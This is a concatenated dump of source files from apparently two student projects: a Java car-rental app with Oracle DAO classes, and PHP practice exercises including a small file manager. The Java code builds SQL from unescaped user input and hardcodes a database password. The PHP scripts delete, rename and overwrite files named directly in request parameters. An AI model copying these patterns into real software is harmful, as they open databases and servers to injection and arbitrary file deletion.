marcaDAO = new MarcaDAO(bd); ResultSet resultado = marcaDAO.getMarca(); TableModel tblModel = buildTableModel(resultado); tableMarca.setModel(tblModel); } catch (Exception e) { Logger.getLogger(ExibirMarca.class.getName()).log(Level.SEVERE, null, e); } } private void bDeletarActionPerformed(java.awt.event.ActionEvent evt) { if(tableMarca.getSelectedRowCount() > 0) { try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); MarcaDAO marcaDAO = new MarcaDAO(bd); for (int i : tableMarca.getSelectedRows()) { Object marcaDeletar = tableMarca.getValueAt(i, 0); String marcaDesc = (String) tableMarca.getValueAt(i, 1); int resposta; resposta = JOptionPane.showConfirmDialog(null, "Deseja deletar a Marca " +marcaDesc + "?"); if (resposta == JOptionPane.YES_OPTION) { marcaDAO.excluir(marcaDeletar); } else { return; } } bd.fecharConexao(); if (bd.sucessoBanco(true)) { JOptionPane.showMessageDialog(null, "Registros deletados com sucesso !", TOOL_TIP_TEXT_KEY, WIDTH, null); } else { JOptionPane.showMessageDialog(null, "Erro de conexão ao banco", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } } catch (Exception e) { Logger.getLogger(ExibirMarca.class.getName()).log(Level.SEVERE, null, e); } } } private javax.swing.JButton bBuscar; private javax.swing.JButton bBuscarTodos; private javax.swing.JButton bDeletar; private javax.swing.JLabel jLabel1; private javax.swing.JLabel jLabel4; private javax.swing.JPanel jPanel2; private javax.swing.JScrollPane jScrollPane1; private javax.swing.JTable tableMarca; private javax.swing.JTextField tdCodigo; }<file_sep>/src/net/danielpaz/pucc/poo/trabalho/model/UsuarioDAO.java package net.danielpaz.pucc.poo.trabalho.model; import java.sql.ResultSet; import net.danielpaz.pucc.poo.trabalho.conexao.BD; import net.danielpaz.pucc.poo.trabalho.control.Usuario; public class UsuarioDAO { private BD bd; public UsuarioDAO (BD bd) throws Exception { if (bd==null) throw new Exception ("Acesso a BD nao fornecido"); this.bd = bd; } public boolean cadastrado (int codigo) throws Exception { String qry; qry = "SELECT * FROM Usuario WHERE IdUsuario=" +codigo; ResultSet resultado = bd.execConsulta (qry); return resultado.first(); } public void incluir (Usuario usuario) throws Exception { if (usuario==null) throw new Exception ("Usuario nao fornecido"); String cmd; cmd = "INSERT INTO Usuario (IdUsuario, Nome, Email) VALUES (" +usuario.getCodigo() +", '" +usuario.getNome() +"', '" +usuario.getEmail() +"')"; bd.execComando (cmd); } public void excluir (Object cod) throws Exception { int codigo = Integer.valueOf(cod.toString()); if (codigo <= 0) throw new Exception ("Codigo invalido"); if (!cadastrado (codigo)) throw new Exception ("Codigo nao cadastrado"); String cmd; cmd = "DELETE FROM Usuario WHERE IdUsuario=" + codigo; bd.execComando (cmd); } public void alterar (Usuario usuario) throws Exception { if (usuario==null) throw new Exception ("Usuario nao fornecido"); if (!cadastrado (usuario.getCodigo())) throw new Exception ("Usuario nao cadastrado"); String cmd; cmd = "UPDATE Usuario SET Nome= '" +usuario.getNome() + "', Email='" +usuario.getEmail() + "' WHERE IdUsuario=" +usuario.getCodigo(); bd.execComando (cmd); } public Usuario getUsuario (int codigo) throws Exception { if (codigo <= 0) throw new Exception ("Codigo invalido"); String qry; qry = "SELECT * FROM Usuario WHERE IdUsuario=" + codigo; ResultSet resultado = bd.execConsulta (qry); if (!resultado.first()) throw new Exception ("Codigo nao cadastrado"); Usuario usuario = new Usuario (resultado.getInt("IdUsuario") ,resultado.getString("Nome"), resultado.getString("Email")); return usuario; } public ResultSet getUsuario () throws Exception { String qry; qry = "SELECT * FROM Usuario"; ResultSet resultado; try { resultado = bd.execConsulta (qry); } catch (Exception e) { throw new Exception ("Problema de acesso ao BD"); } return resultado; } } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/model/MarcaDAO.java package net.danielpaz.pucc.poo.trabalho.model; import java.sql.ResultSet; import net.danielpaz.pucc.poo.trabalho.conexao.BD; import net.danielpaz.pucc.poo.trabalho.control.Marca; public class MarcaDAO { private BD bd; public MarcaDAO (BD bd) throws Exception { if (bd==null) throw new Exception ("Acesso a BD nao fornecido"); this.bd = bd; } public boolean cadastrado (int codigo) throws Exception { String qry; qry = "SELECT * FROM Marca WHERE IdMarca=" +codigo; ResultSet resultado = bd.execConsulta (qry); return resultado.first(); } public void incluir (Marca marca) throws Exception { if (marca==null) throw new Exception ("Marca nao fornecida"); String cmd; cmd = "INSERT INTO Marca (IdMarca, Descricao) VALUES (" +marca.getIdMarca() +", '"+marca.getDescricaoMarca()+"')"; bd.execComando (cmd); } public void excluir (Object cod) throws Exception { int codigo = Integer.valueOf(cod.toString()); if (codigo <= 0) throw new Exception ("Codigo invalido"); if (!cadastrado (codigo)) throw new Exception ("Codigo nao cadastrado"); String cmd; cmd = "DELETE FROM Marca WHERE IdMarca=" +codigo; bd.execComando (cmd); } public void alterar (Marca marca) throws Exception { if (marca==null) throw new Exception ("Marca nao fornecida"); if (!cadastrado (marca.getIdMarca())) throw new Exception ("Marca nao cadastrada"); String cmd; cmd = "UPDATE Marca SET Descricao=" + "'" + marca.getDescricaoMarca() + ", ' " + "WHERE IdMarca=" + marca.getIdMarca(); bd.execComando (cmd); } public Marca getMarca (int codigo) throws Exception { if (codigo <= 0) throw new Exception ("Codigo invalido"); String qry; qry = "SELECT * FROM Marca WHERE IdMarca=" + codigo; ResultSet resultado = bd.execConsulta (qry); if (!resultado.first()) throw new Exception ("Codigo nao cadastrado"); Marca marca; marca = new Marca (resultado.getInt("IdMarca"), resultado.getString("Descricao")); return marca; } public Marca getMarca (String desc) throws Exception { if (desc == null || desc.equals("")) throw new Exception ("Descricao invalido"); String qry; qry = "SELECT * FROM Marca WHERE Descricao= '" +desc + "'"; ResultSet resultado = bd.execConsulta (qry); if (!resultado.first()) throw new Exception ("Descricao nao cadastrado"); Marca marca = new Marca (resultado.getInt("IdMarca"), resultado.getString("Descricao")); return marca; } public ResultSet getMarca () throws Exception { String qry; qry = "SELECT * FROM Marca"; ResultSet resultado; try { resultado = bd.execConsulta (qry); } catch (Exception e) { throw new Exception ("Problema de acesso ao BD"); } return resultado; } } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/control/TipoVeiculo.java package net.danielpaz.pucc.poo.trabalho.control; public class TipoVeiculo { protected int codigo; protected float preco; protected String descricao; public void setCodigo (int codigo) throws Exception { if (codigo <= 0) throw new Exception ("Codigo invalido"); this.codigo = codigo; } public void setDescricao (String descricao) throws Exception { if (descricao==null || descricao.equals("")) throw new Exception ("Descricao nao fornecida"); this.descricao = descricao; } public void setPreco (float preco) throws Exception { if (preco <= 0) throw new Exception ("Marca invalido"); this.preco = preco; } public int getCodigo () { return this.codigo; } public String getDescricao () { return this.descricao; } public float getPreco () { return this.preco; } public TipoVeiculo (int codigo, float preco, String descricao) throws Exception { this.setCodigo (codigo); this.setPreco(preco); this.setDescricao (descricao); } public TipoVeiculo (float preco, String descricao) throws Exception { this.setPreco(preco); this.setDescricao (descricao); } public TipoVeiculo (int codigo) throws Exception { this.setCodigo (codigo); } } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/control/Agendamento.java package net.danielpaz.pucc.poo.trabalho.control; public class Agendamento { private int codigo; private int usuario; private String data; private int veiculo; private int caucao; private String dataFinal; private float valorAluguel; public Agendamento (int codigo) { this.setCodigo(codigo); } public Agendamento (int codigo, int veiculo, int usuario, String data, String dataFinal, float valorAlguel, int caucao) { this.setCodigo(codigo); this.setVeiculo(veiculo); this.setUsuario(usuario); this.setData(data); this.setDataFinal(dataFinal); this.setValorAluguel(valorAlguel); this.setCaucao(caucao); adicionaValorCaucao(caucao,valorAlguel); } public int getCodigo() { return codigo; } public void setCodigo(int codigo) { this.codigo = codigo; } public int getUsuario() { return usuario; } public void setUsuario(int usuario) { this.usuario = usuario; } public int getVeiculo() { return veiculo; } public void setVeiculo(int veiculo) { this.veiculo = veiculo; } public String getDataFinal() { return dataFinal; } public void setDataFinal(String dataFinal) { this.dataFinal = dataFinal; } public String getData() { return this.data; } public void setData(String data) { this.data = data; } public int getCaucao() { return this.caucao; } public void setCaucao(int caucao) { this.caucao = caucao; } public float getValorAluguel() { return valorAluguel; } public void setValorAluguel(float valorAluguel) { this.valorAluguel = valorAluguel; } /** * Metodo que adiciona 10% do valor do alguel se for adicionado caucao * @param caucao - caucao * @param valorAlguel - valor do alguel */ public void adicionaValorCaucao (int caucao, float valorAluguel) { if (caucao == 1) { float valorComCaucao = (float) (valorAluguel + (valorAluguel * 0.1)); setValorAluguel(valorComCaucao); } } }
b629caa5ca260167629ba1599e153039407fc2b3
[ "Java" ]
8
Java
LuisEduardoER/locadoradeveiculospucc
3d239c478b21d463dd05f36c24b159aeb2717b4d
971d00982159c8d79cf86d15332b7dd433730c91
refs/heads/master
<file_sep> def ask_first_name puts "Would the fountain of your mind were clear again, that I might water an ass at it. Also, what's your first name?" gets.chomp end def ask_last_name puts "Thou art the son and heir of a mongrel bitch. Also, what's your last name?" gets.chomp end def greeting(first, last) puts "Hello, #{first} #{last} thou hath more hair than wit, and more faults than hairs, and more wealth than faults." end first = ask_first_name last = ask_last_name greeting(first, last) <file_sep>def questions_and_answers questions = { qname: "What is your name?", qhair: "What color is your hair?", qmovie: "What is your favorite movie (right now)?" } answers = {} puts questions[:qname] answer_1 = gets.chomp # initially I did answers[:aname] = gets.chomp but I couldn't get it to run. answers[:aname] = answer_1 # So that's why I stored the user input into a variable puts questions[:qhair] answer_2 = gets.chomp answers[:ahair] = answer_2 puts questions[:qmovie] answer_3 = gets.chomp answers[:amovie] = answer_3 sentence(answers[:aname], answers[:ahair], answers[:amovie]) end def sentence(name, hair_color, movie) puts "#{name} has #{hair_color} hair and her favorite movie is #{movie}" end questions_and_answers <file_sep>def questions_and_answers questions = { name: "What is your name?", hair: "What color is your hair?", movie: "What is your favorite movie (right now)?" } answers = {} questions.each do |key, value| puts value answers[key] = gets.chomp end sentence(answers[:name], answers[:hair], answers[:movie]) end def sentence(name, hair, movie) puts "#{name} has #{hair} hair and her favorite movie is #{movie}" end questions_and_answers <file_sep> def ask_first_name puts "Would the fountain of your mind were clear again, that I might water an ass at it. Also, what's your first name?" gets.chomp end def ask_last_name puts "Thou art the son and heir of a mongrel bitch. Also, what's your last name?" gets.chomp end def greeting puts "Hello, #{ask_first_name} #{ask_last_name},thou hath more hair than wit, and more faults than hairs, and more wealth than faults." end greeting #<file_sep>def ask_number puts 'Give me a number, any number' gets.chomp end def turn_into_integer(number_string) number_1 = number_string.to_i end def do_math_things(number) number_2 = number + 5 number_2 *= 2 number_2 -= 4 number_2 /= 2 final_number = number_2 - number puts "Congrats, you ended up with #{final_number} again!" end number_string = ask_number number = turn_into_integer(number_string) do_math_things(number) <file_sep>class PlatonicPerson def talk_about_self(name, calling) puts "My name is, #{name}, and I am a #{calling}" end def list characters = { 'a' => '<NAME>', 'b' => 'Sappho of Lesbos', 'c' => 'Archimedes', 'd' => 'Telesilla of Argos', 'e' => 'Thargelia of Miletus', 'f' => 'Demetrius of Thessaloniki' } puts 'Choose from one of the following characters: (type a, b, c...etc)' characters.each do |k, v| puts "#{k}) #{v}" end end def choose_person(characters) selection = gets.chomp name = characters[selection] end def ask_and_answer(question) puts question gets.chomp end def platonics traits = {} bravery = ask_and_answer("Rate your character's bravery from 1-10") traits[:bravery] = bravery.to_i rationality = ask_and_answer("Rate your character's rationality from 1-10") traits[:rationality] = rationality.to_i eloquence = ask_and_answer("Rate your character's verbal eloquence from 1-10") traits[:verbal_eloquence] = eloquence.to_i physical_strength = ask_and_answer("Rate your character's physical strength from 1-10") traits[:physical_strength] = physical_strength.to_i traits end def main_trait(platonics_hash) # Find the trait with the highest rating max_value = platonics_hash.values.max trait = platonics_hash.key(max_value) trait.to_s end def calling(trait) puts trait.class case trait when 'bravery' 'infantry' when 'rationality' 'philosopher' when 'eloquence' 'priest' when 'physical_strength' 'chariot_racer' else 'peasant' end end end pp = PlatonicPerson.new pp_list = pp.list name = pp.choose_person(pp_list) pp_traits = pp.platonics puts pp_traits trait = pp.main_trait(pp_traits) calling = pp.calling(trait) pp.talk_about_self(name, calling) <file_sep># Learn Ruby Projects This repository contains several homework problems that I worked on while I was learning Ruby in the summer of 2017. I had a wonderful mentor named <NAME> that helped me learn Ruby on the job. At the time, I was a manual QA tester trying to transition to being in a QA Test Automation role. These exercises are basic and embarrassing (have to start somewhere!), but they helped me learn Ruby data structures and fundamentals that were crucial to master if I wanted to write automated test scripts. I'm choosing to keep this repository up because it's kind of a nice reminder that my abilities that I take as granted today were concepts I struggled with a few years ago. <file_sep> #locate login button by id and click, when the drop-down opens #click in the username text field and set username,click in #password field and set password, click login -- is when_present necessary? browser = Watir::Browser.new :chrome browser.goto('staging.taskeasy.com') browser.a(id: 'login-drop').when_present.click browser.input(id: 'displayName').set('<EMAIL>') browser.input(id: 'password').set('<PASSWORD>') browser.button(id: 'loginButton').click #write something that would check to see #if eric crimmins is still on the about us page browser = Watir::Browser.new :chrome browser.goto('taskeasy.com/about/') eric = browser.div(id: 'our_leadership').text.include?('<NAME>') if eric == true puts "Yay! Eric still works here!" else puts "I blame Coral's machiavellian scheme." end <file_sep>def ask_for_name questions = ["Would the fountain of your mind were clear again, that I might water an ass at it. Also, what's your first name?", "Thou art the son and heir of a mongrel bitch. Also, what's your last name?"] names = [] questions.each do |question| puts question names << gets.chomp end greeting(names[0], names[1]) end def greeting(first, last) puts "Hello, #{first} #{last}, thou hath more hair than wit, and more faults than hairs, and more wealth than faults." end ask_for_name
bb91f28978dd9444ee4c233b19e7c9446a20f442
[ "Markdown", "Ruby" ]
9
Ruby
ameliakindall/projects
f5aafd86dcb855303d055cf9f3152a54d9e3e259
51ee660d6f321410942cafc209049a6495711c6d
refs/heads/master
<file_sep> public interface EstadoMascota { public void avanzarHasta(int x, int y, Mascota unaMascota); public void descansar(Mascota unaMascota); public void cambiarDeEstadoA(Mascota unaMascota); } <file_sep> public class Contenta implements EstadoMascota { public void avanzarHasta(int x, int y, Mascota unaMascota) { unaMascota.disminuirEnergiaEn(y); unaMascota.aumentarAnimoEn(2*(x+y)); if(estaDebilitada(unaMascota)) { cambiarDeEstadoA(unaMascota); } } private boolean estaDebilitada(Mascota unaMascota) { return (unaMascota.getEnergia()<40); } public void cambiarDeEstadoA(Mascota unaMascota) { unaMascota.cambiarEstado(new Cansada()); } public void descansar(Mascota unaMascota) { unaMascota.aumentarEnergiaEn(5); } } <file_sep> public abstract class Mascota { private int energia; private int animo; private int posicionEnX; private int posicionEnY; private EstadoMascota estado; protected Mascota() { super(); this.animo = 100; this.energia = 100; this.posicionEnX = 0; this.posicionEnY = 0; } public int getEnergia() { return energia; } public int getAnimo() { return animo; } public int getPosicionEnX() { return posicionEnX; } public int getPosicionEnY() { return posicionEnY; } public EstadoMascota getEstado() { return estado; } public void disminuirEnergiaEn(int unidades) { this.energia -= unidades; } public void aumentarEnergiaEn(int unidades) { this.energia += unidades; } public void aumentarAnimoEn(int unidades) { this.animo += unidades; } public void disminuirAnimoEn(int unidades) { this.animo -= unidades; } public void avanzarPosicion(int unidades, int unaPosicion) { unaPosicion+=unidades; } public void retrocederPosicion(int unidades, int unaPosicion) { unaPosicion-=unidades; } public void cambiarEstado(EstadoMascota unEstado) { this.estado = unEstado; } public void descansar() { this.estado.descansar(this); } public void avanzarHasta(int x, int y) { avanzarPosicion(x, getPosicionEnX()); avanzarPosicion(y, getPosicionEnY()); getEstado().avanzarHasta(x, y, this); } public boolean tenesHambre() { return true; } public boolean estasEnForma() { return false; } } <file_sep> import java.util.ArrayList; import java.util.List; import java.util.stream.Collectors; public class Entrenador { private String nombre; private int edad; private int posicionX; private int posicionY; private List<Mascota> mascotas; public Entrenador() { super(); this.mascotas = new ArrayList<>(); this.posicionX = 0; this.posicionY = 0; } public String getNombre() { return nombre; } public void setNombre(String nombre) { this.nombre = nombre; } public int getEdad() { return edad; } public void setEdad(int edad) { this.edad = edad; } public void agregar(Mascota unaMascota) { mascotas.add(unaMascota); } public void quitar(Mascota unaMascota) { mascotas.remove(unaMascota); } public void avanzarHasta(int unPuntoX, int unPuntoY) { this.posicionX += unPuntoX; this.posicionY += unPuntoY; } public void daleRespiroALosHambrientos() { List<Mascota> mascotasConHambre = mascotas.stream().filter(unaMascota -> unaMascota.tenesHambre()).collect(Collectors.toList()); mascotasConHambre.forEach(unaMascota -> unaMascota.descansar()); } public void entrenaMascotasHasta(int unPuntoX, int unPuntoY) { for(Mascota unaMascota : mascotas) { unaMascota.avanzarHasta(unPuntoX, unPuntoY); } avanzarHasta(unPuntoX, unPuntoY); } } //HOLAAAAAAAAAA
5e16aba73759b67864412e00b1b3c2095f47df55
[ "Java" ]
4
Java
gasgalarza/MiEntrenamientoMascotas
d1705ec290b56b37cad3ab93940184519a194e5b
598b7afda21e714ebf194c1edb5d752fbd0c130a
refs/heads/main
<repo_name>DifferDeveloper123/Engplate<file_sep>/index.js const useremail = document.getElementById("email"); const mobileNumber = document.getElementById("mobile number"); const whatsappNumber = document.getElementById("whatsapp number"); const address = document.getElementById("address"); const thought = document.getElementById("thought"); const submitBtn = document.getElementById("submitBtn"); const { PDFDocument, rgb, degrees } = PDFLib; const capitalize = (str, lower = false) => (lower ? str.toLowerCase() : str).replace(/(?:^|\s|["'([{])+\S/g, (match) => match.toUpperCase() ); submitBtn.addEventListener("click", () => { const val = capitalize(useremail.value); const mobVal = capitalize(mobileNumber.value); const whatsVal = capitalize(whatsappNumber.value); const addVal = capitalize(address.value); const thoughtVal = capitalize(thought.value); if (val.trim() !== "" && useremail.checkValidity() && mobVal.trim() !== "" && whatsVal.trim() !== "" && addVal.trim() !== "" && thoughtVal.trim() !== "") { generatePDF(val, mobVal, whatsVal, addVal, thoughtVal); } else { useremail.reportValidity(); mobileNumber.reportValidity(); whatsappNumber.reportValidity(); address.reportValidity(); } }); const generatePDF = async (email, mobile, whatsapp, address, thought) => { const existingPdfBytes = await fetch("./English Coaching.pdf").then((res) => res.arrayBuffer() ); const pdfDoc = await PDFDocument.load(existingPdfBytes); pdfDoc.registerFontkit(fontkit); const fontBytes = await fetch("./VarelaRound-Regular.ttf").then((res) => res.arrayBuffer() ); const VarelaRound = await pdfDoc.embedFont(fontBytes); const pages = pdfDoc.getPages(); const firstPage = pages[0]; firstPage.drawText(email, { x: 290, y: 300, size: 10, font: VarelaRound, color: rgb(1,1,1), }); firstPage.drawText(address, { x: 500, y: 300, size: 10, font: VarelaRound, color: rgb(1,1,1), }); firstPage.drawText(mobile, { x: 290, y: 235, size: 10, font: VarelaRound, color: rgb(1,1,1), }); firstPage.drawText(whatsapp, { x: 500, y: 235, size: 10, font: VarelaRound, color: rgb(1,1,1), }); firstPage.drawText(thought, { x: 350, y: 450, size: 35, font: VarelaRound, color: rgb(1,1,1), }); const pdfBytes = await pdfDoc.save(); console.log("Done creating"); var file = new File( [pdfBytes], "English Template.pdf", { type: "application/pdf;charset=utf-8", } ); saveAs(file); }; // init();
486f0d711611303851b105e8570f0434a0156aef
[ "JavaScript" ]
1
JavaScript
DifferDeveloper123/Engplate
87ed831aeac3837a12003d1142324c07a466f84a
19090e7fa0310118100386526b650fc13c565ec3
refs/heads/master
<repo_name>Yaroslav-Ivanov/first<file_sep>/wrk5.2.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php // обработка без секции $iniArray = parse_ini_file("file.ini"); print_r($iniArray); //обработка с секциями $iniArray = parse_ini_file("file.ini", true); print_r($iniArray); ?> </body> </html><file_sep>/new.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $money = 2000; $proc = 11.5; $stav = 1; // for (; $stav <= 14; $stav++) { // $money = $money + ($money * (($proc / 12) / 100 )); // } // echo $money; // while($stav <= 14){ // $money = $money + ($money * (($proc / 12) / 100 )); // $stav++; // } // echo $money; do{ $money = $money + ($money * (($proc / 12) / 100 )); $stav++; } while($stav <= 14); echo $money; ?> </body> </html><file_sep>/2header/1header3.php <?php header('Content-type: application/pdf'); header('Content-Disposition: attachment; filename="downloaded.pdf"'); readfile('original.pdf'); ?><file_sep>/2header/1header2.php <?php header('Location: http://tut.by/'); ?> <file_sep>/first.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $a=3; echo "\$a=$a"; ?> <?php $arr = array("foo" => "bar", 12 => true); echo $arr["foo"]; echo $arr[12]; echo "<br>"; $arr = array("somearray" => array(6 => 5, 13 => 9, "a" => 42)); echo $arr["somearray"] [6]; echo $arr["somearray"] [13]; echo $arr["somearray"] ["a"]; echo "<br>"; echo"<pre>"; print_r($arr = array("some" => array(5 => 12, 23, 45, 69, "b" => 41))) ; echo $arr["some"] [5]; echo $arr["some"] ["a"]; "</pre>" ?> <?php $arr = array(5 => 1, 12 => 2); $arr[] = 56; print_r($arr); $arr["x"] = 42; print_r($arr); unset($arr[5]); unset($arr); echo "<br>"; class foo { function do_foo() { echo "Doing foo."; } } $bar = new foo; $bar ->do_foo(); ?> <!-- if --> <?php if ($a > $b) { echo "a больше, чем b"; $b = $a; } echo "<br>"; // else if ($a > $b) { echo "a is greater than b"; } else { echo "a is NOT greater than b"; } echo "<br>"; // Альтернативный синтаксис if ($a == 5): echo "a equals 5"; echo "..."; elseif ($a == 6): echo "a equals 6"; echo "!!!"; else: echo "a is neither 5 nor 6"; endif; ?> </body> </html><file_sep>/time/sec.php <?php $time_start = microtime(1); for ($i=0; $i < 1000; $i++){ } $time_end = microtime(1); $time = $time_end - $time_start; echo "Ничего не делал $time секунд\n"; ?><file_sep>/downloader/del.php <?php unlink('file/'. $_GET['file']); header("Location: file2.php"); ?><file_sep>/colorbox/box.php <<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> <link rel="stylesheet" href="box.css"> </head> <body> <div class="colbox" style="width: <?= $_GET['a']?>px; height: <?= $_GET['b']?>px; background-color: <?= $_GET['color']?>"></div> <?php // print_r($_GET); $first = $_GET['a']; $second = $_GET['b']; $area = $_GET['a'] * $_GET['b']; echo " Площадь прямоугольника = $area ." ; ?> </body> </html><file_sep>/downloader/file2.php <?php $arr = scandir("file"); for ($i = 2; $i < count($arr); $i++) { switch (explode(".", $arr[$i])[1]) { case 'docx'; $icon = 'docx-file-14-504256.png'; break; case 'pdf'; $icon = 'adobe-pdf-icon.png'; break; default: $icon = 'images.png'; break; } $filesize = round(((filesize("file\\$arr[$i]")) / 1024) / 1024, 3) . "Mb"; echo "<a href='file\\$arr[$i]'><img src='$icon' width='26' height='26'>$arr[$i]</a> <a href='del.php?file=$arr[$i]'><img src='cross.png' width='32' height='32'></a> <a href='textarea.php?file=$arr[$i]'><img src='edit.png' width='26' height='26'></a> <a href='rename.php?file=$arr[$i]'><img src='pan.png' width='20'></a> <a href='view.php?file=$arr[$i]'><img src='glaz.png' width='20'></a> $filesize <br>"; } <file_sep>/downloader/ren.php <?php rename ('file//'.$_POST['oldname'],'file//'.$_POST['name']); header("Location: file2.php"); ?><file_sep>/file.ini [first] one = 1 five = 5 [second] path = /usr/local/bin<file_sep>/dz5.2.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $f = fopen("count.dat", "r"); $count = fgets($f); $count = $count + 1; echo $count; fclose($f); $c = fopen("count.dat","w+"); fwrite($c,$count); ?> </body> </html><file_sep>/2header/1header7.php <?php print_r($_SERVER); ?> <a href="?name=Vasya">ggg</a> <a href="?hello">hello</a><file_sep>/downloader/file/dz5.2.php Document</title> </head> <body> <?php $f = fopen("count.dat", "r"); $count = fgets($f); $count = $count + 1; echo $count; fclose($f); $c = fopen("count.dat","w+"); fwrite($c,$count); ?> </body> </html>>><file_sep>/opros/opros2.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $ind = $_POST['op']; $arr = file('opros.csv'); $opr = explode(" - ",$arr[$ind]); $opr[1]+=1; $arr[$ind] = implode(" - ", $opr)."\n"; file_put_contents('opros.csv', $arr); foreach($arr as $value){ echo "$value<br>"; } $s = 0; for ($i=1; $i <count($arr); $i++) { $s = $s + explode(" - ", $arr[$i])[1]; } echo $s; for ($i=1; $i <count($arr); $i++) { $buf = explode(" - ", $arr[$i]); echo $buff[0] . " - " ($buf[1] / $sum * 100). "<br>"; } ?> </body> </html><file_sep>/2header/1header6.php <?php print_r($_GET); ?> <a href="?name=Vasya">ggg</a> <a href="?hello">hello</a><file_sep>/function2.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $array = array(144444, 2, 3232, 4456, 5355); function takes_array($array) { $max = $array[0]; for ($i = 1; $i < count($array); $i++) { if ($array[$i] > $max) { $max = $array[$i]; } } return $max; } echo takes_array($array) ?> </body> </html><file_sep>/downloader/fileedit.php <?php file_put_contents('file/'. $_POST['oldname'], $_POST['name']); header("Location: file2.php"); ?><file_sep>/README.md # first * d;gd;g * fgdgdf * adfsf * qq *курсив* **еще курсив** ~~зачеркнул~~ 9. список 1. второй список # FFFF ## ghgh ### fgfgd #### ghghf <blockquote> цитата </blockquote> [ссылочка](https://ru.wikipedia.org/wiki/Markdown) Первая колонка | Вторая колонка ------ | ------ тут текст | <file_sep>/wrk5.6.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $a = 'кушать'; echo mb_strtoupper($a); echo "<br>"; $a = 'кушать'; echo mb_strtolower($a); echo "<br>"; $b = 'kyshats'; echo str_shuffle($b); ?> </body> </html><file_sep>/downloader/textarea.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> </head> <body> <form action="fileedit.php" method="POST"> <textarea name="name" cols="30" rows="10" ><?= htmlspecialchars(file_get_contents('file//'. $_GET['file'])) ?></textarea> <input type="hidden" name="oldname" value="<?=$_GET['file']?>"><br> <input type="submit" value="Save"> </form> <form action="back.php "> <input type="submit" value="Back"> </form> </body> </html><file_sep>/table.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $array = array( 1 => 'Иванов', 2 => 'Петров', 3 => 'Сидоров', ) ?> </body> </html><file_sep>/work17.01.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <!-- Передача аргументов по ссылке --> <?php function plus(&$string){ $string .= ' + Петя'; } $str = 'Ира'; plus($str); echo $str; echo "<br>"; ?> <!-- Исползование значиний по умолчанию в определении функции --> <?php function makecoffee($type = "cappuccino"){ return "Making a cup of $type. \n"; } echo makecoffee(); echo "<br>"; echo makecoffee("espresso"); echo "<br>"; ?> <!-- Област видимости переменной --> <?php $a = 1; function Test(){ echo $a; } Test(); ?> <!-- Область видимости переменной --> <?php $a = 1; $b = 2; function Sum(){ global $a, $b; $b = $a + $b; } Sum(); echo $b; echo "<br>"; ?> <!-- Статические переменные --> <?php function Test2(){ static $a = 0; echo $a; $a++; } Test2 (5); echo $a; ?> </body> </html><file_sep>/function.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php // $makefoo = true; // bar (); // if ($makefoo) { // function foo () // { // echo "I don't exist program execution reaches me. \n"; // } // } // if ($makefoo) foo(); // function bar() // { // echo "I exiat immediately upon program start.\n"; // } //Вложенные функции // function foo () // { // function bar() // { // echo "I don't exist until foo() is called.\n"; // } // } // foo(); // bar(); //Передача массива в функцию // $input = array(5, 1); // function takes_array($input) // { // echo '$input[0] + $input[1] =', // $input[0]+$input[1]; // } // takes_array($input); // $input = array(5, 1); // function takes_array($input) // { // echo '$input[0] + $input[1] =', // ($input[0]+$input[1]) * 2; // } // takes_array($input); //Массив умноженный на 2 // function takes_array($input) // { // echo '$input[0] + $input[1] =', // $input[0]+$input[1]; // } // takes_array(array(5, 7)); // function mul($arr) // { // for ($i = 0; $i < count($arr); $i++){ // $arr[$i] = $arr[$i] * 2; // } // return $arr; // } // print_r(mul ([1, 2, 3])); //выбрать большее число $a = 584; $b = 8544; $g = 445; $f = 55; function numb($a, $b, $g, $f){ if ($a > $b) { $c = $a; } else { $c = $b; } if ($c < $g){ $c = $g; } if($f > $g){ $c = $f; } return $c; } echo numb($a,$b,$g,$f); ?> </body> </html><file_sep>/downloader/file/less190219.php <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" 